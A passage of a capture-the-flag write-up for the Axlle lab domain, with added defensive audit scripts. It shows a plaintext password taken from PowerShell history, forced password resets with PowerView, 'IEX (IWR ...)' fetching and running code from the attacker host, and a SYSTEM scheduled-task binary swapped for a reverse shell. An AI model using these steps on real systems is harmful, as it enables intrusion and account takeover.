C:\Users\dallon.matrix>tree /f
tree /f
Folder PATH listing
Volume serial number is BFF7-F940
C:.
+---Desktop
       user.txt
C:\Users\dallon.matrix>type .\Desktop\user.txt
d25c2eb60aa5df291c86f643086c4b87

Privilege Escalation (jacob.greeny)

The user is part of Web Devs, which means we should have access to some development features.

C:\Users\dallon.matrix>whoami /all
User Name           SID
=================== =============================================
axlle\dallon.matrix S-1-5-21-1005535646-190407494-3473065389-1125

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users              Alias            S-1-5-32-559                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Group used for deny only
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
LOCAL                                      Well-known group S-1-2-0                                       Mandatory group, Enabled by default, Enabled group
AXLLE\Web Devs                             Group            S-1-5-21-1005535646-190407494-3473065389-1127 Mandatory group, Enabled by default, Enabled group
AXLLE\Employees                            Group            S-1-5-21-1005535646-190407494-3473065389-1103 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1                                      Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\Users\dallon.matrix>powershell
PS C:\> Get-ADGroup -Properties * -Identity 'Web Devs'

CanonicalName                   : axlle.htb/Users/Web Devs
CN                              : Web Devs
Created                         : 1/2/2024 5:42:37 AM
createTimeStamp                 : 1/2/2024 5:42:37 AM
Deleted                         :
Description                     : Web Wizards
DisplayName                     : Web Devs
DistinguishedName               : CN=Web Devs,CN=Users,DC=axlle,DC=htb
dSCorePropagationData           : {1/2/2024 6:33:15 AM, 1/2/2024 6:26:06 AM, 1/2/2024 6:02:13 AM, 12/31/1600 4:00:00 PM}
GroupCategory                   : Security
GroupScope                      : Global
groupType                       : -2147483646
HomePage                        :
instanceType                    : 4
isDeleted                       :
LastKnownParent                 :
ManagedBy                       :
member                          : {CN=Dallon Matrix,DC=axlle,DC=htb, CN=Calum Scott,DC=axlle,DC=htb, CN=Dan Kendo,DC=axlle,DC=htb, CN=Trent Langdon,DC=axlle,DC=htb}
MemberOf                        : {CN=Employees,CN=Users,DC=axlle,DC=htb}
Members                         : {CN=Dallon Matrix,DC=axlle,DC=htb, CN=Calum Scott,DC=axlle,DC=htb, CN=Dan Kendo,DC=axlle,DC=htb, CN=Trent Langdon,DC=axlle,DC=htb}
Modified                        : 1/2/2024 6:33:15 AM
modifyTimeStamp                 : 1/2/2024 6:33:15 AM
Name                            : Web Devs
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  : CN=Group,CN=Schema,CN=Configuration,DC=axlle,DC=htb
ObjectClass                     : group
ObjectGUID                      : 30b2b798-6b14-4019-9d49-63d72056520e
objectSid                       : S-1-5-21-1005535646-190407494-3473065389-1127
ProtectedFromAccidentalDeletion : False
SamAccountName                  : Web Devs
sAMAccountType                  : 268435456
sDRightsEffective               : 0
SID                             : S-1-5-21-1005535646-190407494-3473065389-1127
SIDHistory                      : {}
uSNChanged                      : 41228
uSNCreated                      : 41081
whenChanged                     : 1/2/2024 6:33:15 AM
whenCreated                     : 1/2/2024 5:42:37 AM

Access to C:\App Development is still denied to us.

Checking the PowerShell history (PSReadLine's ConsoleHost_history.txt) reveals the user's password in plaintext:

PS C:\Users\dallon.matrix\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> cat $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
$SecPassword = ConvertTo-SecureString 'PJsO1du$CVJ#D' -AsPlainText -Force;
$Cred = New-Object System.Management.Automation.PSCredential('dallon.matrix', $SecPassword);

Creds: dallon.matrix:PJsO1du$CVJ#D
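Two things a defender would want at this point, as an added example that is not part of the original writeup: a scan over every user's PSReadLine history for command lines that embed a credential (the ConvertTo-SecureString line above is the classic case), and a history handler that keeps such lines out of ConsoleHost_history.txt in the first place. It assumes PSReadLine 2.x and enough rights to read other users' profiles; the regex list and function names are my own.

```powershell
# Added example, not from the writeup: find plaintext secrets in PSReadLine
# history files and stop new ones from being recorded.
# Assumptions: PSReadLine 2.x, rights to read the other users' profile dirs.

# Regexes for command lines that commonly carry a secret (constructed list).
$SecretPatterns = @(
    'ConvertTo-SecureString\s+\S.*-AsPlainText',
    'PSCredential\s*\(',
    '\s-(Password|Pass|Pwd|Secret|Token|ApiKey)\s+\S+',
    '\bnet\s+use\b.*\s/user:',
    '\b(password|passwd|secret|token)\s*[:=]\s*\S+'
)

function Find-PSReadLineSecrets {
    [CmdletBinding()]
    param(
        # Directory holding per-user profiles; C:\Users on a standard install.
        [string]$ProfileRoot = (Join-Path $env:SystemDrive 'Users')
    )
    # Same relative path for Windows PowerShell and PowerShell 7 on Windows.
    $historyRel = 'AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt'

    foreach ($dir in Get-ChildItem -LiteralPath $ProfileRoot -Directory -ErrorAction SilentlyContinue) {
        $histFile = Join-Path $dir.FullName $historyRel
        if (-not (Test-Path -LiteralPath $histFile)) { continue }
        $lineNo = 0
        foreach ($line in Get-Content -LiteralPath $histFile -ErrorAction SilentlyContinue) {
            $lineNo++
            foreach ($pat in $SecretPatterns) {
                if ($line -match $pat) {
                    [pscustomobject]@{
                        User    = $dir.Name
                        File    = $histFile
                        Line    = $lineNo
                        Pattern = $pat
                        # Mask quoted literals so the report does not re-leak the secret.
                        Snippet = $line -replace "(['""])[^'""]*\1", '$1***$1'
                    }
                    break   # one finding per line is enough
                }
            }
        }
    }
}

function Enable-PSReadLineSecretFilter {
    # PSReadLine calls the handler before saving each line; returning $false
    # drops the line from both in-memory and on-disk history. Put a call to
    # this function in $PROFILE so every session gets it.
    $patterns = $SecretPatterns
    $handler = {
        param([string]$line)
        foreach ($pat in $patterns) {
            if ($line -match $pat) { return $false }
        }
        return $true
    }.GetNewClosure()
    Set-PSReadLineOption -AddToHistoryHandler $handler
}

# Report findings without the secret itself.
Find-PSReadLineSecrets | Format-Table User, Line, Pattern, Snippet -AutoSize
```

Recent PSReadLine releases already refuse to record lines containing a few keywords such as "password" or "AsPlainText"; the handler above lets you extend that list with your own patterns, while the scan finds what older hosts still hold on disk. Treat every hit as a credential that has to be rotated, not just deleted from the file.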

Since we now have valid domain credentials, we can collect information about the DC with BloodHound.

Refer to: [[Bloodhound]]

[Screenshot: Writeup-3.png]

To show everything a group has control over in BloodHound: select the group -> First Degree Object Control.

[Screenshot: Writeup-5.png]

It looks like our group (Web Devs) has ForceChangePassword over two users: jacob.greeny and baz.humphries.

References: The Hacker Recipes (ForceChangePassword); PowerView Set-DomainUserPassword docs: https://powersploit.readthedocs.io/en/latest/Recon/Set-DomainUserPassword/; scripts: https://github.com/PowerShellMafia/PowerSploit
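The edge BloodHound draws here is an ACE on the target user object granting the "Reset Password" extended right. As an added example that is not part of the writeup, the following script enumerates every user object and reports ACEs that grant that right (or GenericAll, which implies it) to principals other than the expected administrative holders, which is what you would run to find and remediate such edges without BloodHound. It assumes the RSAT ActiveDirectory module; the list of expected holders and the function name are my own choices.

```powershell
# Added example, not from the writeup: enumerate ACEs on user objects that grant
# the "Reset Password" extended right (BloodHound's ForceChangePassword edge)
# or GenericAll to principals other than the expected administrative ones.
# Assumptions: RSAT ActiveDirectory module installed; the caller can read
# security descriptors (any authenticated user can, by default).
Import-Module ActiveDirectory

# Schema GUID of the User-Force-Change-Password extended right. An ExtendedRight
# ACE with the all-zero GUID grants every extended right, which includes it.
$ResetPasswordGuid = [guid]'00299570-246d-11d0-a768-00aa006e0529'
$AllRightsGuid     = [guid]'00000000-0000-0000-0000-000000000000'

$domain = Get-ADDomain
$nb     = $domain.NetBIOSName
# Holders for which this right is expected (constructed list); anything else is reported.
$ExpectedHolders = @(
    'NT AUTHORITY\SYSTEM', 'NT AUTHORITY\SELF',
    'BUILTIN\Administrators', 'BUILTIN\Account Operators',
    "$nb\Domain Admins", "$nb\Enterprise Admins"
)

function Find-ForceChangePasswordRights {
    [CmdletBinding()]
    param([string]$SearchBase = $domain.DistinguishedName)

    $adRights = [System.DirectoryServices.ActiveDirectoryRights]
    foreach ($user in Get-ADUser -Filter * -SearchBase $SearchBase) {
        # The AD: drive exposes each object's security descriptor to Get-Acl.
        $acl = Get-Acl -Path ("AD:\" + $user.DistinguishedName)
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            $holder = $ace.IdentityReference.Value
            if ($ExpectedHolders -contains $holder) { continue }

            $rights  = $ace.ActiveDirectoryRights
            $isReset = $rights.HasFlag($adRights::ExtendedRight) -and
                       ($ace.ObjectType -eq $ResetPasswordGuid -or $ace.ObjectType -eq $AllRightsGuid)
            $isAll   = $rights.HasFlag($adRights::GenericAll)
            if (-not ($isReset -or $isAll)) { continue }

            $rightName = 'ForceChangePassword'
            if ($isAll) { $rightName = 'GenericAll' }
            [pscustomobject]@{
                Target    = $user.SamAccountName
                Holder    = $holder
                Right     = $rightName
                # Inherited ACEs come from an OU or the domain head; fix them there.
                Inherited = $ace.IsInherited
            }
        }
    }
}

Find-ForceChangePasswordRights | Sort-Object Holder, Target | Format-Table -AutoSize
```

On this domain the output would list AXLLE\Web Devs as Holder for jacob.greeny and baz.humphries, matching the BloodHound view. The script deliberately ignores WriteDacl and WriteOwner, which also lead to a password reset but are reported by BloodHound as separate edges; Get-ADUser -Filter * is also a full directory walk, so scope SearchBase on a large domain.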

└─$ cp /opt/PowerSploit/Recon/PowerView.ps1 .
---
PS C:\users\public> IEX (IWR 10.10.16.75/PowerView.ps1 -UseBasicParsing)
PS C:\users\public> $NewPassword = ConvertTo-SecureString 'Password123$' -AsPlainText -Force
PS C:\users\public> Set-DomainUserPassword -Identity 'jacob.greeny' -AccountPassword $NewPassword
PS C:\> iwr 10.10.16.75/RunasCs.exe -o \users\public\rc.exe
meterpreter > bg
msf6 exploit(multi/handler) > run -j
msf6 exploit(multi/handler) > sessions 40
meterpreter > shell
C:\>powershell
PS C:\> \users\public\rc.exe 'jacob.greeny' 'Password123$' \users\public\rev.exe
^C
meterpreter > bg
msf6 exploit(multi/handler) > sessions 41
meterpreter > getuid
Server username: AXLLE\jacob.greeny 
PS C:\Windows\system32> whoami /all

User Name          SID
================== =============================================
axlle\jacob.greeny S-1-5-21-1005535646-190407494-3473065389-1120

Group Name                                 Type             SID                                           Attributes
========================================== ================ ============================================= ==================================================
Everyone                                   Well-known group S-1-1-0                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users              Alias            S-1-5-32-559                                  Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                  Group used for deny only
NT AUTHORITY\INTERACTIVE                   Well-known group S-1-5-4                                       Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                              Well-known group S-1-2-1                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                      Mandatory group, Enabled by default, Enabled group
AXLLE\App Devs                             Group            S-1-5-21-1005535646-190407494-3473065389-1108 Mandatory group, Enabled by default, Enabled group
AXLLE\Employees                            Group            S-1-5-21-1005535646-190407494-3473065389-1103 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                   Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

We are part of App Devs and finally have access to C:\App Development:

PS C:\App Development> tree /f
C:.
+---kbfiltr
       kbfiltr.sln
       README.md
    +---exe
           kbftest.c
           kbftest.vcxproj
           kbftest.vcxproj.Filters
    +---sys
            kbfiltr.c
            kbfiltr.h
            kbfiltr.inx
            kbfiltr.rc
            kbfiltr.vcxproj
            kbfiltr.vcxproj.Filters
            public.h
            rawpdo.c

There is a README.md, so let's check what the project does:

PS C:\App Development\kbfiltr> cat readme.md
## Keyboard Translation Program
This is an application in development that uses a WDF kbfiltr as the basis for a translation program. The aim of this application is to allow users to program and simulate custom keyboard layouts for real or fictional languages.

### Features
- Create custom keyboard layouts for real or fictional languages.
- Simulate keyboard inputs using the custom layouts.
- Secret codes to switch between languages and logging output.

### Progress
- kbfiltr driver - Complete
- Keyboard mapping - Complete (hardcoded in driver)
- Custom mapping in application layer - In progress
- Logging - Complete
- Activation of logging - Complete
- Simulation of other keyboard layouts - Incomplete
- Activation of other keyboard layouts - Incomplete

**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**

### Prerequisites
- Windows 10 or higher
- Visual Studio 2019
- Windows Driver Kit (WDK) 10

### Getting Started
- Clone this repository.
- Open the solution file in Visual Studio.
- Build the solution in Release mode.
- Install the driver by running `.\devcon.exe install .\kbfiltr.inf "*PNP0303"` as Administrator.
- Install the driver as an upperclass filter with `.\devcon.exe /r classfilter keyboard upper -keylogger` as Administrator.
- Install the application by running the install_app.bat file as Administrator.
- Reboot your computer to load the driver.
- Launch the application and start programming your custom keyboard layouts.

### Usage
#### Programming a Custom Layout
- Launch the application.
- Click on the Program Layout button.
- Select the language for which you want to program the layout.
- Select the key you want to modify from the list.
- Modify the key's scancode and virtual key code as required.
- Repeat steps 4 and 5 for all the keys you want to modify.
- Save the layout by clicking on the Save Layout button.

#### Simulating Inputs
- Launch the application.
- Click on the Simulate Input button.
- Select the language for which you want to simulate the input.
- Type in the input in the normal English layout.
- Trigger language switch as outlined below (when required).
- Verify that the input is translated to the selected language.

#### Logging Output
- Launch the application.
- Turn on logging (shortcuts can be created as explained below)
- Use the application as normal.
- The log file will be created in the same directory as the application.

### Triggering/Activation
- To toggle logging output, set up a shortcut in the options menu. INCOMPLETE
- To switch to a different language, press the Left Alt key and the Right Ctrl key simultaneously. INCOMPLETE

### Bugs
There are probably several.

Zip the directory and download:

PS C:\App Development> & "C:\Program Files (x86)\hMailServer\Bin\7za.exe" a -tzip C:\Users\Public\app.zip .\kbfiltr
meterpreter > download C:\\Users\\Public\\app.zip

The source itself has nothing interesting, but the note the developer left in the README does: standalonerunner.exe is run automatically as SYSTEM, i.e. a scheduled task (the Windows equivalent of a cron job).

meterpreter > cd "C:\\Program Files (x86)\\Windows Kits\\10\\Testing\\StandaloneTesting\\Internal"
meterpreter > ls
Listing: C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal
==================================================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
040777/rwxrwxrwx  0      dir   2024-01-01 00:57:22 -0500  arm
040777/rwxrwxrwx  0      dir   2024-01-01 00:57:11 -0500  arm64
100777/rwxrwxrwx  71     fil   2023-09-13 21:28:22 -0400  run.bat
100666/rw-rw-rw-  15665  fil   2023-09-30 10:40:52 -0400  run.ps1
100777/rwxrwxrwx  73     fil   2023-09-13 21:28:22 -0400  setup.bat
100666/rw-rw-rw-  14762  fil   2023-09-30 10:41:00 -0400  setup.ps1
100666/rw-rw-rw-  21504  fil   2023-09-30 10:38:44 -0400  standaloneexport.dll
040777/rwxrwxrwx  4096   dir   2024-06-25 09:59:28 -0400  x64
040777/rwxrwxrwx  0      dir   2024-01-01 00:57:23 -0500  x86

It looks like we have full (777) permissions on the directory where the binary lives (the mode bits Meterpreter shows for Windows files are approximate, so confirm with icacls before relying on them). Since the binary is run by a scheduled task as SYSTEM, we can replace it with a reverse shell and get SYSTEM.

meterpreter > cd x64
meterpreter > cp standalonerunner.exe standalonerunner.exe.bak
meterpreter > cp C:\\Users\\Public\\rev.exe standalonerunner.exe
meterpreter > ls
Listing: C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64
======================================================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  7168   fil   2024-06-25 06:50:27 -0400  standalonerunner.exe
100666/rw-rw-rw-  33392  fil   2023-09-30 06:08:18 -0400  standalonerunner.exe.bak
100666/rw-rw-rw-  43632  fil   2023-09-30 06:08:26 -0400  standalonexml.dll
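The misconfiguration abused here is a privileged scheduled task whose executable, or the directory containing it, is writable by low-privileged principals. As an added example that is not part of the writeup, the following audit walks every enabled scheduled task that runs as SYSTEM (or elevated), resolves the action's binary and checks both the file and its parent directory for write-type ACEs granted to Everyone, Authenticated Users, BUILTIN\Users and similar. It assumes Windows 8 / Server 2012 or later (ScheduledTasks module) and local administrator rights; the principal list and function names are my own.

```powershell
# Added example, not from the writeup: find scheduled tasks running as SYSTEM
# (or elevated) whose executable or its parent directory can be modified by
# low-privileged principals.
# Assumptions: ScheduledTasks module (Win8/2012+), run from an elevated shell.

# Principals that should never be able to write a SYSTEM task's binary (constructed list).
$LowPrivPrincipals = @(
    'Everyone', 'NT AUTHORITY\Authenticated Users', 'BUILTIN\Users',
    'NT AUTHORITY\INTERACTIVE', 'NT AUTHORITY\ANONYMOUS LOGON'
)
# Named rights that let a caller replace or alter the file or its directory.
$WriteRights = [System.Security.AccessControl.FileSystemRights] `
    'Write, Modify, FullControl, WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
# Generic rights are not named in the enum but still appear in ACEs.
$GenericWriteBits = 0x40000000 -bor 0x10000000   # GENERIC_WRITE | GENERIC_ALL

function Get-WeakFileAce {
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        $raw = [int]$ace.FileSystemRights
        if ((($raw -band [int]$WriteRights) -ne 0) -or (($raw -band $GenericWriteBits) -ne 0)) {
            [pscustomobject]@{ Path = $Path; Principal = $ace.IdentityReference.Value; Rights = $ace.FileSystemRights }
        }
    }
}

function Resolve-TaskExecutable {
    param([string]$Execute)
    # Task actions may quote the path, use environment variables, or omit the .exe.
    $exe = [Environment]::ExpandEnvironmentVariables($Execute.Trim('"'))
    if (Test-Path -LiteralPath $exe -PathType Leaf) { return (Resolve-Path -LiteralPath $exe).Path }
    # Unqualified names are looked up on PATH, itself a search-order risk.
    $cmd = Get-Command $exe -ErrorAction SilentlyContinue
    if ($cmd -and $cmd.Source) { return $cmd.Source }
    return $null
}

function Find-WritableTaskBinaries {
    [CmdletBinding()]
    param(
        # Only tasks running as these accounts matter; other tasks cannot elevate.
        [string[]]$PrivilegedRunAs = @('SYSTEM', 'NT AUTHORITY\SYSTEM', 'LocalSystem', 'Administrator')
    )
    foreach ($task in Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' }) {
        $runAs = $task.Principal.UserId
        if (-not $runAs) { $runAs = $task.Principal.GroupId }
        if ($PrivilegedRunAs -notcontains $runAs -and $task.Principal.RunLevel -ne 'Highest') { continue }
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions have no Execute
            $exe = Resolve-TaskExecutable $action.Execute
            if (-not $exe) { continue }
            # Check the binary and its parent directory: a writable parent lets a
            # caller rename and replace the file even when the file's own ACL is tight.
            foreach ($p in @($exe, (Split-Path -Parent $exe))) {
                foreach ($weak in Get-WeakFileAce -Path $p) {
                    [pscustomobject]@{
                        Task      = $task.TaskPath + $task.TaskName
                        RunAs     = $runAs
                        Path      = $weak.Path
                        Principal = $weak.Principal
                        Rights    = $weak.Rights
                    }
                }
            }
        }
    }
}

Find-WritableTaskBinaries | Format-Table -AutoSize
```

The check only follows the action's direct executable. When a task runs cmd.exe or powershell.exe with a script in its arguments (run.bat and run.ps1 in the listing above are that shape), the script and anything it launches need the same ACL check, so extend the audit to the Arguments field for those interpreters. Program Files (x86) normally inherits administrator-only write ACLs, so a hit under it is a deliberate or accidental ACL change worth tracing in file-system audit logs rather than just fixing in place.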

Privilege Escalation (Administrator)

For whatever reason the msfvenom payload was not triggering, so I just decided to use a Golang reverse shell.

Refer to [[Golang Reverse Shell]]

Root.txt

PS C:\users\Administrator> cat Desktop/root.txt
1909061be135bf5f98a16c62b9950436
